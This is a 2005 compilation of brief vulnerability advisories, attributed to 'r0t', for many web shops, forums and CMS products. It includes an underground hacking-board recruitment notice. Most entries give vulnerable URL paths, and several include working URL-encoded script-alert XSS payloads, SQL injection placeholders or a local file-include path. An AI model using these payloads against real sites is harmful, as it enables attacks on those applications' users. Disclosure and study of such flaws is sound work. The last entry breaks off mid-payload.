Acuity CMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

+
note: also "page" paramter isn't properly sanitised after some unsanitised input form user will get error like:

Microsoft VBScript runtime error '800a000d'

I dont think that is vuln, but ...

Solution:
Edit the source code to ensure that input is properly sanitised.

RED QUEEN Path Disclosure

RED QUEEN Path Disclosure

Vuln. discovered by : r0t
Date: 16 dec. 2005
vendor:http://www.randommouse.com/cgi-bin/rms/
product/about/about_product.cgi?sku=REDQN
&referer=hotscripts&creative=link_indexing
affected version:1.02 and prior

Product Description:

Now with zipcode-based searching and image galleries! Large sites rely on user reviews to provide efficient wealth discovery of the content of their pages. Red Queen features the most advanced review system available in a Link Manager. With custom ratings per category, custom SQL fields, file uploads, auto-thumbnailing, templates, forum membership integration, top reviewers, a powerful search engine, link validation, and static page builds among its features, you're set to compete with the big sites. You can even set up Groups for Members to join, Yellow Pages for Suppliers, and everything is reviewable, even the members themselves!


Vuln. Description:

RED QUEEN "redqueen.cgi" does not verify user input supplied to the "yellowpage_id" "skin_id" "supplier_id". A malicious person can exploit this to gain knowledge of the full path to the installation directory by sending a HTTP request including invalid input to those paremters.

examples:

/redqueen.cgi?module=find_supplier&yellowpage_id=x

/redqueen.cgi?module=supplier&supplier_id=48&skin_id=x

/redqueen.cgi?module=supplier&supplier_id=x

/redqueen.cgi?module=x

Solution:
Edit the source code to ensure that input is properly sanitised.

iHTML Merchant Mall SQL inj.

iHTML Merchant Mall SQL inj.

Vuln. discovered by : r0t
Date: 16 dec. 2005
vendor:http://www.ihtmlmerchant.com/features_mall.htm
affected version: latest

Product Description:

The iHTML Merchant Mall is specifically designed for Internet Service Providers and Application Service Providers that are implementing a large number of stores. With a powerful web-based store management area, you can add a new store in seconds. A new hosting customer can even create and setup her own storefront on her own. The Mall allows for an unlimited number of stores to be setup on a single server. The individual stores in the Mall have the same feature set as the iHTML Merchant 2.0 Enterprise edition. Stores can become part of a portal-like store directory, or can be independent with their own domain name. When creating a new store, a mall manager can set up billing options and define the feature set that will be available to the store owner. Preset billing plans can also be created to provide for even faster creation of stores. Stores can be automatically billed their hosting fees, thus automating much of your client management process.
The Mall edition can also be used by manufacturers to provide pre-populated stores for their resellers, by companies that want to provide a portal for buyers and sellers in a particular industry to gather and place orders plus many more applications that are outside of how you might think of a shopping mall.



Vuln. Description:

iHTML Merchant Mall contains a flaw that allows a remote sql injection attacks.Input passed to the "id" "store" "step" parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

example:

/browse.ihtml?step=4&store=42&id=[SQL]
/browse.ihtml?step=4&store=1[SQL]
/browse.ihtml?step=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

iHTML Merchant Version 2 Pro sql inj.

iHTML Merchant Version 2 Pro sql inj.

Vuln. discovered by : r0t
Date: 16 dec. 2005
vendor:http://www.ihtmlmerchant.com/features_2_pro.htm
affected version:2 and prior

Product Description:

The iHTML Merchant Pro builds on the success of the first version. Basically we took all the feedback from users and built it into the product. It is an affordable, fully customizable system for creating web storefronts and much more advanced that the first version. Ideal for small and medium sized businesses, it is both powerful and easy to use. ISPs will appreciate the browser-based administration which allows customers to handle their own configuration and changes. Featuring complete banner ad management, several different payment processing options, professional templates and the ability to handle complex shipping and tax calculations, this system is one of the fastest and easiest ways to get high-end stores online.

Vuln. Description:

Merchant Version 2 Pro contains a flaw that allows a remote sql injection attacks.Input passed to the "id" "pid" "step" parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code


example:
/merchant.ihtml?id=56&step=[SQL]
/merchant.ihtml?id=[SQL]
/merchant.ihtml?pid=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Webglimpse XSS vuln.

Webglimpse XSS vuln.
Vuln. discovered by : r0t
Date: 16 dec. 2005
vendor:http://webglimpse.net/
affected version:2.14.1 and prior

Product Description:

Webglimpse can index and search any collection of documents you choose - local files including PDF, MS Word and any others with available filter; and remote files spidered from specified websites. Flexible rules allow you to control output format, ranking of hits, which links are spidered. Language templates include Spanish, German, French, Italian, Norwegian, Finnish, Hebrew, Arabic and more. The core indexing program is in C, and is scalable up to 100s of Gb of data. Web & command line administration interfaces for managing archives. Partnership with SearchFeed allows webmasters to add sponsored links easily to generate revenue from site visitors.


Vuln. Description:

Webglimpse contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "ID" paremter in "webglimpse.cgi" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

example:

/webglimpse.cgi?query=&ID=1[XSS]

Solution:
Edit the source code to ensure that input is properly sanitised.

Today about us in soon future

1 month close to time when i was started to report public about unsecured systems on net.
Even i will do maybe some days more , my way is another way ...exploring net and not reporting about net.
Of course my friends think that is "kindergarten" style to express your self on scene , but i think that sometimes you must do some things that must be done.
I and my friends had board 1 month ago on hackers.by.lv now board was closed for maintance , but not for long , the board will be back very soon , to give a possibilty share our skills with others.
Forget about white hat´ism , board will be in underground , maybe to deep on underground , of course we will share information only for general it* education and not for kidies who want to get easy fame.
I wrote this message to someone who are ready to be part of real community and not just for fame stuff on scene.
If you are skilled enough to share your skill and expirience with others you will be welcome to our crew.
Till now our community was international we had crew members from USA,Latvia,Germany...but it not big diference from wich part of globe you come , general is that what you can and what you do.
If you will join us you can contact me admin[at]hackers[dot]by[dot]lv

ezUpload Pro vuln

ezUpload Pro vuln

Vuln. discovered by : r0t
Date: 16 dec. 2005
vendor:http://www.scriptscenter.com/ezupload/
affected version: 2.2 and prior

Product Description:

ezUpload Pro is the world's most popular PHP upload solution. Packed with features, installed by over 1300 websites, ezUpload Pro has everything you need to allow secure file uploads to your website today! Download uploaded files via our file browser, through FTP (files are put on separate directories) or even receive them as email attachements. Our comprehesive control panel allows to control the files you accept (based on size, extension & dimensions), the fields of the upload form, the general look of the form, who can access the form and much more. New version 2.2 features user authentification, ability to store data in a MySQL database (storage in files still possible), radio boxes and much more.

Vuln. Description:

1.Input passed to the "mode" in "index.php" parameter isn't properly verified, before it is used to include files. This can be exploited to include arbitrary files from local resources.

2.Input passed to the search module paremters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Solution:
Edit the source code to ensure that input is properly sanitised.

paFileDB Extreme Edition SQL inj

paFileDB Extreme Edition SQL inj

Vuln. discovered by : r0t
Date: 16 dec. 2005
vendor:http://pafiledb.byethost15.com/
affected version:RC 5 and prior


Product Description:

The core of this script is based on paFileDB 3.1 but with alot features (that`s why i call it Extreme Edition). These are some of the features: - 4 level sub category - 3 different ways to calculate the filesize of a file (so that the script can run on free servers to) - highly advanced screenshot/thumbnailing settings - download screenshots to your server (if supported) - show thumbnails in the category and viewall view - tons of settings that you can change in the admin panel (no need to edit the source or edit sql query`s by hand) - build in news management/system page numbers if there are a x number reply`s - small logging system (for adding/editing/deleting things) - secured comment system - advanced settings for the comments system like br`s and smily`s Feel free to test it!! it`s FREE


Vuln. Description:

paFileDB Extreme Edition contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed "newsid" "id" in "pafiledb.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/pafiledb.php?news=showcontent&newsid=[SQL]
/pafiledb.php?action=category&id=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

phpXplorer XSS vuln.

phpXplorer XSS vuln.

Vuln. discovered by : r0t
Date: 16 dec. 2005
vendor:http://www.phpxplorer.org/
affected version:0.9.12 and prior

Product Description:

phpXplorer is a free open source file management system / explorer written in PHP. It enables you to work on a remote file system through a web browser. By default it has got dialogs for editing HTML, PHP, image, Apache, compressed and email files. Its modular design makes it easy to build your own filetypes, property sheets, views and themes. phpXplorers permission manager enables you to restrict the access to the shared file system for multiple users in a detailed way.

Vuln. Description:

phpXplorer contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to adress bar field isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


Solution:
Edit the source code to ensure that input is properly sanitised.

ScareCrow Message Board XSS vuln.

ScareCrow Message Board XSS vuln.

Vuln. discovered by : r0t
Date: 16 dec. 2005
vendor:http://scarecrow.sourceforge.net/
affected version:2.13 and prior

Product Description:

ScareCrow is a fully featured and free message board system. It is meant to be both powerful and easy to use, for the users and the administrator. Released under the GPL License, ScareCrow hopes to gather a great community of users and developers to make it the best message board in existance.

Vuln. Description:

ScareCrow Message Board contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "forum" "user" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.



examples:

/forum.cgi?forum=[XSS]
/profile.cgi?action=view&user=[XSS]
/post.cgi?action=new&forum=[XSS]


Solution:
Edit the source code to ensure that input is properly sanitised.

Binary Board System XSS vuln.

Binary Board System XSS vuln.

Vuln. discovered by : r0t
Date: 16 dec. 2005
vendor:http://binary-concepts.com/cgi/bbs/
affected version:0.2.5 and prior

Product Description:

The Binary Board System (BBS) is a complete Perl/SQL bulletin board solution. Its features include a complete user login system, a multi-board interface with easy administration and categorization, and ease of customization that sets it apart from the rest.



Vuln. Description:

Binary Board System contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "inreplyto" "article" "branch" "board" "user" and search module paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.



examples:

/reply.pl?board=1&article=
81&inreplyto=[XSS]&[member]=yes

/reply.pl?board=1&article=
[XSS]&inreplyto=0&[member]=yes

/reply.pl?board=[XSS]&article=
81&inreplyto=&[member]=yes

/stats.pl?action=branchdetail
&branch=[XSS]&view=posts&[member]=yes

/stats.pl?action=boarddetail&board=
[XSS]&view=posts&[member]=yes

/stats.pl?action=userdetail&user=
[XSS]&view=posts&[member]=yes

/toc.pl?board=[XSS]&[member]=yes


Solution:
Edit the source code to ensure that input is properly sanitised.

SiteNet BBS XSS vuln

SiteNet BBS XSS vuln
Vuln. discovered by : r0t
Date: 15 dec. 2005
vendor:www.focalmedia.net/sitenetbbs.html
affected version:2.0 and prior


Product Description:

Fast, customizable, moderation, upload of user images, user profiles, optional user registration, emoticons, e-mail notification and many other features. Also comes with extensive admin and moderator admin panels to manage all aspects of your forums. Also included is a special setup interface to ensure easy installation.


Vuln.description:

SiteNet BBS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "pg" "tid" "cid" "fid" paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


examples:

/netboardr.cgi?fid=929&cid=926&tid=965&pg=[XSS]
/netboardr.cgi?fid=929&cid=926&tid=[XSS]
/netboardr.cgi?fid=929&cid=[XSS]
/netboardr.cgi?fid=[XSS]
/search.cgi?cid=[XSS]



Solution:
Edit the source code to ensure that input is properly sanitised.

bbBoard v2 XSS vuln.

bbBoard v2 XSS vuln.

Vuln. discovered by : r0t
Date: 15 dec. 2005
vendor:http://www.bbv2.com/
affected version: v2.56 and prior

Product Description:

bbBoard v2 is the best message board software, guaranteed*! bbBoard is completely customisable and code-modifiable, in various languages. Because of bbBoard's clean interface and auto-installation and updation features, it makes it an uncomplicated tool for even the novice computer user! bbBoard can be accessed using a cellular phone (WAP), NNTP, Telnet, and MSN Messenger. And you still can interact by posting, sending PMs, using the Chat feature, visiting the Calendar or posting a webcam recording.

Vuln. Description:

bbBoard v2 contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


Solution:
Edit the source code to ensure that input is properly sanitised.

DCForum XSS vuln.

DCForum XSS vuln.

Vuln. discovered by : r0t
Date: 15 dec. 2005
vendor:www.dcscripts.com/dcforum.shtml
affected version: 6.25 and prior



Product Description:

DCForum a complete bulletin board system from DCScripts. Its main features include: Multiple Forums, Efficient implementation, fast performance, Clean and intuitive user interface, Easy customization, Supports both Fully threaded and linear style discussion, Three levels of forum types - public, protected, and private, Three-level navigation - Lobby, Main, and Topic, Topics stored as both text-delimited database file and html file, and much more.

Vuln.description:

DCForum contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "page" and search module paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


example:

/dcboard.php?az=show_topic&forum=46&topic_id=
2215&mesg_id=2215&page=[XSS]



Solution:
Edit the source code to ensure that input is properly sanitised.

AlmondSoft Products SQL inj.

AlmondSoft Products SQL inj.

Vuln. discovered by : r0t
Date: 15 dec. 2005
vendor:http://www.almondsoft.com/
affected products: Almond Classifieds 5.02 and Pro edition,Standart edition,E-Commerce Edition.
and Almond Personals 4.05 and prior versions.

AlmondSoft info:

We offer custom CGI/Perl/MySQL, PHP/MySQL programming for your needs, developing CGI scripts, scripts for classified ads, custom solutions for dynamic web pages.


Vuln.description:

Almond Products contains a flaw that allows a remote sql injection attacks.Input passed to the "id" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code


Solution:
Edit the source code to ensure that input is properly sanitised.

Atlant Pro XSS vuln.

Atlant Pro XSS vuln.

Vuln. discovered by : r0t
Date: 15 dec. 2005
vendor:http://www.atlantpro.com/
affected version: 8.09 and prior


Product Description:

Atlant Pro can work with plain text or MySQL databases. Script supports fee based membership sign up with real-time credit card processing. Some classifieds abilities (submitting ads, sending privacy mail to ad owners, viewing ads ) can be specified for using only by members. Before ads appear in the index admin can optionally moderate ad submissions. Users can place ads with many photos, preview photo and multimedia file. Password protected editing, renewing, deleting of ads. Powerful database searching capabilities with many criteria. Users can subscribe for mail list with special criteria. HTML Templates. Admin. can specify high priority level and comments for some ads. Anti-Spamming Features. For each category a set of ad fields (such as price, city, age, area, etc.) can be specified. Try the free version to see how it works !


Vuln. Description:

Atlant Pro contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "before" "ct" paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


examples:

/atl.cgi?ct=a8&md=search&brf=&before=
%22%3E%3Cscript%3Ealert('r0t')%3C/scr
ipt%3E

/atl.cgi?ct=%22%3E%3Cscript%3Ealert
('r0t')%3C/script%3E

Solution:
Edit the source code to ensure that input is properly sanitised.

AtlantForum XSS vuln.

AtlantForum XSS vuln.

Vuln. discovered by : r0t
Date: 15 dec. 2005
vendor:www.atlantpro.com/atlfm.html
affected version:4.02 and prior, also AtlantForum Lite and AtlantForum Pro can have same vuln.


Product Description:

Message board featuring: Free or fee based membership subscribing, users can post/edit/delete/reply messages with photos and multimedia files; Search messages with keywords, photos, topics, posted by a user; Mail Lists; Script can work with text based or MySQL databases.

Vuln. Description:

AtlantForum contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "sch_allsubct" "before" "ct" paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


examples:

/atl.cgi?ct=&md=search&brf=&before=
&sch_allsubct=%22%3E%3Cscript%3Eal
ert('r0t')%3C/script%3E

/atl.cgi?ct=&md=search&brf=&before=
%22%3E%3Cscript%3Ealert('r0t')%3C/scr
ipt%3E

/atl.cgi?ct=%22%3E%3Cscript%3Ealert
('r0t')%3C/script%3E


Solution:
Edit the source code to ensure that input is properly sanitised.

CommerceSQL XSS vuln.

CommerceSQL XSS vuln.

Vuln. discovered by : r0t
Date: 15 dec. 2005
vendor:http://commercesql.com/
affected version:1.0 and prior

Product Description:

CommerceSQL is a MySQL-driven shopping cart program. Some of its main features include: Inventory Control, Customer Registration, Recommend Similar Items Purchased, and more.

Vuln. Description:

CommerceSQL contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution:
Edit the source code to ensure that input is properly sanitised.

eDatCat XSS vuln.

eDatCat XSS vuln.

Vuln. discovered by : r0t
Date: 15 dec. 2005
vendor:http://www.edatcat.com/
affected version: v3.0 and prior

Product Description:

eDatCat is a fully customizable database and shopping cart system. Features include: real-time UPS shipping, browser-based administration, retail & wholesale pricing, customer accounts, order tracking, powerful inventory controls, wish list, discount support, support for AuthorizeNet/CyberCash/VeriSign and others, completely customizable appearance, and more. eDatCat allows you to design your shopping cart around your site- not your site around your shopping cart. Create a fully tailored, seamless, and powerful e-commerce environment with eDatCat. A fully-functional 10-day trial available for download.

Vuln. Description:

eDatCat contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed "user_action" paremter in "EDCstore.pl" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

example:
/EDCstore.pl?user_action=%22%3E%3Cs
cript%3Ealert('r0t')%3C/script%3E

Solution:
Edit the source code to ensure that input is properly sanitised.

ECW-Cart XSS vuln.

ECW-Cart XSS vuln.

Vuln. discovered by : r0t
Date: 15 dec. 2005
vendor:www.soft4e.com/cart.html
affected version:2.03 and prior

Product Description:

ECW-Cart - simple for use featured shopping cart with ability to use MS Excel or Access format for database. Users can calculate progressive discount for chosen products list. Search for keywords and prices. Merchant can prepare list of products for on-line selling by using MS Excel or Access, then easy upload prepared database into Web Server via any FTP client. Admin can specify in config file groups of products, order features, discounts for different order prices.

Vuln. Description:


ECW-Cart contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed "kword" "max" "min" "comp" "f" paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/index.cgi?c=search&s=ok&id=191&kword=
%22%3E%3Cscript%3Ealert%28%27r0t%27%29
%3C%2Fscript%3E&f=r0t+XSS&comp=0&min=
&max=

/index.cgi?c=search&s=ok&id=191&kword=
&f=r0t+XSS&comp=0&min=&max=%22%3E%3Csc
ript%3Ealert%28%27r0t%27%29%3C%2Fscrip
t%3E

/index.cgi?c=search&s=ok&id=191&kword=
&f=r0t+XSS&comp=0&min=%22%3E%3Cscript%
3Ealert%28%27r0t%27%29%3C%2Fscript%3E

/index.cgi?c=search&s=ok&id=191&kword=
&f=r0t+XSS&comp=%22%3E%3Cscript%3Ealert
%28%27r0t%27%29%3C%2Fscript%3E

/index.cgi?c=search&s=ok&id=191&kword=
&f=%22%3E%3Cscript%3Ealert%28%27r0t%27
%29%3C%2Fscript%3E

Solution:
Edit the source code to ensure that input is properly sanitised.


ps. "r0t+XSS" change to existing paremeter.

ECTOOLS - Onlineshop XSS

ECTOOLS - Onlineshop XSS

Vuln. discovered by : r0t
Date: 15 dec. 2005
vendor:http://www.ectools.de/
affected version:1.0 and prior

Product Description:

ECTOOLS Onlineshop contains a trackingsystem, to let your customers watch their order status. Easy to set up, easy data-upload, easy picture-upload easy administration and many other features like extended sales-stats and much more. This is a german version with only one template to modify to fit to the design of your homepage


Vuln. Description:

contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed "product" "category" "uid" paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/cart.cgi?action=link&product=%22%3E%3Cscri
pt%3Ealert('r0t')%3C/script%3E

/cart.cgi?action=search&category=%22%3E%3Cs
cript%3Ealert('r0t')%3C/script%3E

/cart.cgi?action=link&product=33&uid=%22%3E
%3Cscript%3Ealert('r0t')%3C/script%3E


Solution:
Edit the source code to ensure that input is properly sanitised.

PPCal Shopping Cart XSS

PPCal Shopping Cart XSS

Vuln. discovered by : r0t
Date: 15 dec. 2005
vendor:http://www.paypalshoppingcart.org/
affected version:3.3.0 and prior


Product Description:

PPCal Shopping Cart allows integration and automation of PayPal payments on your web site. Applications are numerous. PPCal can be easily customized to serve any purpose, associated with PayPal payment.

Vuln. Description:

PPCal Shopping Cart contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed "stop" "user" paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


examples:
/ppcal.cgi?action=shop&user=8001&start=21
&stop=%22%3E%3Cscript%3Ealert('r0t')%3C
/script%3E


/ppcal.cgi?action=shop&user=%22%3E%3Cscri
pt%3Ealert('r0t')%3C/script%3E


Solution:
Edit the source code to ensure that input is properly sanitised.

PlexCart X3 SQL inj. vuln.

PlexCart X3 SQL inj. vuln.

Vuln. discovered by : r0t
Date: 15 dec. 2005
vendor:www.plexum.com/ecommerce/shopping_cart/
affected version:3.0 and prior

Product Description:
Your complete eCommerce and shopping cart solution for online web stores of all sizes. PLEXCART X3 makes the management of your online store easier – so you have more time to devote to building your business – instead of spending all of your time running it!

Vuln. Description:

PlexCart X3 contains a flaw that allows a remote sql injection attacks.Input passed to the all parameters in product search module isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

Solution:
Edit the source code to ensure that input is properly sanitised.

DomainCart XSS

DomainCart XSS

Vuln. discovered by : r0t
Date: 15 dec. 2005
vendor:www.zaygo.com/domain-shopping-cart/domaincart/
affected version:2.0 and prior

Product Description:

Zaygo DomainCart is a complete domain name search, order and registration solution. It allows your customers to search for domain names in over 100 top level domains, including .tv, .md and .ws domains. Domains can be added to a shopping cart, with automatic price and tax calculation. You can set separate prices for different domains, and allow registration for different numbers of years. After ordering, DomainCart can send customizable emails to you and your customers, with order details. DomainCart has easy web-based admin and installation, and is completely customizable using downloadable themes or your own HTML templates. DomainCart can be upgraded with plugins for automatic domain registration, credit card providers, selling hosting plans, domain transfers, and search wizards.

Vuln. Description:

DomainCart contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


Solution:
Edit the source code to ensure that input is properly sanitised.

HostingCart XSS

HostingCart XSS

Vuln. discovered by : r0t
Date: 15 dec. 2005
vendor:www.zaygo.com/hosting-tools/hostingcart/
affected version:2.0 and prior

Product Description:

Zaygo HostingCart is a complete shopping cart, designed especially for ISPs and hosting companies. It includes an integrated domain name search. Customers can buy hosting plans on their own or associated with a specific domain name. You can define hosting plans with names and prices, and choose prices for domain name registration in different TLDs for 1-10 years. Features: transfer domain function, with ownership check; customisable order emails to you and purchasers; automatic price and tax calculation; easy web-based admin and installation; Free downloadable HTML themes or design your own look using simple HTML templates; and upgradable with plugins for automatic domain registration, credit card processing, domain name wizards, and faster searching.


Vuln. Description:

HostingCart contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


Solution:
Edit the source code to ensure that input is properly sanitised.

StaticStore Search Engine Friendly E-Commerce XSS

StaticStore Search Engine Friendly E-Commerce XSS

Vuln. discovered by : r0t
Date: 15 dec. 2005
vendor:www.staticstore.com
affected version:1.189A and prior

Product Description:

StaticStore is a full store and online catalog builder complete with a browser based store manager for categorizing, adding, copying, moving, editing, and deleting products from your product database. Static search engine friendly HTML pages are then created from the MySQL product database. StaticStore is a robust store and online catalog builder and is able to categorize and build hundreds of product categories and thousands of static search engine friendly HTML product pages. StaticStore will allow you to categorize and start adding products immediately upon installation. StaticStore is truly the most "search engine friendly" and "user friendly" store and online catalog builder available in the market today.



Vuln. Description:

StaticStore contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to parameter in "search.cgi" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


Solution:
Edit the source code to ensure that input is properly sanitised.

ClickCartPro (CCP) XSS vuln.

ClickCartPro (CCP) XSS vuln.

Vuln. discovered by : r0t
Date: 14 dec. 2005
vendor:http://www.clickcartpro.com/
affected version:5.1 and prior

Product Description:

CCP is a full featured shopping cart engine that will install on virtually any webserver, and does not require root access or special modules. The entire software package uses SQL and a relational database model, which allows tie-ins to many RDBMS (MySQL, PostgreSQL, Microsoft SQL Server, etc.). It runs out of the box in CSV mode. 100% of the front-end and web based administrator is configurable using its 200+ functions. Features: multi-level categories, product downloads, data import/export, easy product option and relationship management, dynamic form and page generation, easy site layout editing, file uploads, discounts, order tracking, keyword search, flexible shipping with UPS integration or default and custom methods. Integrated with 28 payment processors including PayPal. Offline processing included.


Vuln. Description:

ClickCartPro contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "affl" parameter in "cp-app.cgi" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

example:

/cp-app.cgi?usr=51H4515590&rnd=57730
8&rrc=N&affl=%22%3E%3Cscript%3Ealert
('r0t')%3C/script%3E


Solution:
Edit the source code to ensure that input is properly sanitised.

The CITY Shop XSS vuln.

The CITY Shop XSS vuln.

Vuln. discovered by : r0t
Date: 14 dec. 2005
vendor:http://www.nightmedia.net/shop/
affected version:1.3 and prior


Product Description:

The CITY Shop is one of the most advanced, and certainly the most flexible open-source shopping cart available on the market. The CITY Shop has been designed with utmost flexibility in mind. Its object-oriented architecture allows it to perform exceptionally on any platform that provides Perl.
The CITY Shop runs under normal Perl, mod_perl, and any other scripting accelerators available. We value the user input regarding features and improvements, and we implement most of them in real time, making the new development easily available for everybody.


Vuln. Description:

The CITY Shop contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution:
Edit the source code to ensure that input is properly sanitised.

PDEstore XSS vuln.

PDEstore XSS vuln.

Vuln. dicovered by : r0t
Date: 14 dec. 2005
vendor:www.smart-choices.org/docs/pdestore.html
affected version:1.8 and prior

Product Description:
PDEstore Ver. 1.8 is an easy to easy to install, easy to use online shopping cart cgi script and is easily installed via FTP. PDEstore makes configuring your store calculations easy to update and change as needed. PDEstore does not use complex modules to complicate consistent, error-free operation. Easy web-based management scripts make it easy to maintain your store products. PDEstore simplifies the process of selling products from your web site.

Vuln. Description:

PDEstore contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module parameter and "product" "cart_id" parameters in "pdestore.cgi" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/pdestore.cgi?product=%22%3E%3Cscript
%3Ealert('r0t')%3C/script%3E

/pdestore.cgi?product=jewelry&cart_id
=%22%3E%3Cscript%3Ealert('r0t')%3C/s
cript%3E


Solution:
Edit the source code to ensure that input is properly sanitised.

ezDatabase vuln.

ezDatabase vuln.

Vuln. dicovered by : r0t
Date: 14 dec. 2005
vendor:http://www.ezdatabase.org/
affected version:2.1.2 and prior

Product Description:

A web based program for creating online databases, written in PHP and MySQL. An Admin CP allows you to create databases, fields, categories, users, user groups and customize your databases using powerful templates + settings. Visitors can access your databases via the Visitor File. Export a database, create search forms, view database statistics, approve visitor uploads, implement user registration, use language files, and add built-in extras to your databases such a comments, ratings, and automatic file download logging. 30 day money back guarantee.

Vuln. Description:

1. Input passed to the "p" parameter isn't properly verified, before it is used to include files. This can be exploited to include arbitrary files from local resources.

2.Input passed to the "db_id" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

3.Input passed to the "cat_id" parameter isn't properly sanitised beforereturn to user. This can be exploited to
get full instalisations path.


examples:

Local file include.

/index.php?p=../Local file

SQL injection.

/index.php?p=getcat&db_id=[SQL]

Directory Travesal

/index.php?p=getcat&db_id=1&cat_id=[CODE]



Solution:
Edit the source code to ensure that input is properly sanitised.

WikkaWiki XSS vuln.

WikkaWiki XSS vuln.

Vuln. dicovered by : r0t
Date: 14 dec. 2005
vendor:http://wikka.jsnx.com/
affected version:1.1.6.0 and prior

Product Description:
WikkaWiki is a lightweight and flexible wiki engine allowing easy management of Websites, in particular collective Web-based projects: it provides an intuitive interface for modifying page content, tracking and comparing revisions made by single users, and setting user access privileges. It features W3 compliant XHTML and CSS output, several text formatting options, categories, a GUI for editing pages, support for images, tables, Flash objects, RSS feeds, FreeMind maps, advanced Access Control List management, referrers management, and text search functions. Designed for easy customizability, it aims at keeping its core as light as possible while maintaining an architecture that supports extensibility through plugin modules.

Vuln. Description:

WikkaWiki contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "phrase" parameter isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

example:
/TextSearch?phrase=%22%3E%3Cscript%3Ealert
